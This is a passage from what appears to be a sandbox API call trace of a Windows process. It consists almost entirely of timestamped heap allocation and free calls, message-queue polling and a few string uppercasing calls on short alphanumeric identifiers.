(HeapHandle=0x25c0000, Flags=0x0, Size=0x134a3) returned 0x24c7a50 [0198.691] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0198.691] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0198.691] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0198.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0198.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x134a3) returned 0x24c7a50 [0198.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1858 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0198.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x134a3) returned 0x34c2258 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0198.694] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0198.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.695] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0198.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0198.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0198.695] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.695] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0198.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0198.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.696] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0198.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0198.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0198.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.697] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0198.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0198.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0198.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.698] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0198.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0198.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0198.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.699] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0198.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0198.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.700] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0198.700] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0198.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9db0 [0198.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.700] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0198.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.701] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0198.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0198.701] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.701] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0198.701] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0198.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0198.702] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.702] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0198.703] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.703] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.703] HeapFree (in: 